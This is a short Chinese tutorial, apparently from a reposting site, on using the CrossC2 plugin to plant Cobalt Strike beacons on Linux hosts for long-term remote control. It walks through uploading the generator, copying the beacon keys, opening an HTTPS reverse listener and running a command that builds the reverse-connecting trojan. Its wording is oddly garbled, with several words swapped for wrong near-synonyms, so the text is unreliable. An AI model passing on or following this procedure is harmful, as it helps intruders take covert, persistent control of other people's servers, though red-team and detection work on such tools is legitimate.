CobaltStrike上线Linux主机(CrossC2)工具使用

写在前面

在红蓝对立中，我们经常会碰到需求对Linux主机停止长期远控的状况。关于Windows主机，我们能够运用CobaltStrike，那么自然我们会想问，CobaltStrike能否对Linux主机停止长期远控呢？

如何经过在Linux上执行木马反弹一个CobaltStrike类型的shell，这得依赖于一个CobaltStrike的插件CrossC2。

CrossC2插件项目地址：https://github.com/gloxec/CrossC2

注：CrossC2项目官方声明只支持CobaltStrike3.14版本，自己亲测CobaltStrike4.0也可正常上线，但是无法执行其他操作。

1.首先，访问CrossC2项目地址，下载该项目。

将项目src目录下 genCrossC2.Linux 文件上传到CobaltStrike效劳端目录下。

2.将 CobaltStrike 效劳端的.cobaltstrike.beacon_keys下载到 CobaltStrike 客户端目录下。

3.由于 Cross C2目前只支持HTTPS Beacon，所以在Listenrs当选择HTTPS停止监听，

效劳端开启监听 windows/beacon_https/reverse_https 类型的beacon

4.生成木马

./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test

5.执行木马上线

感谢您的来访，获取更多精彩文章请收藏本站。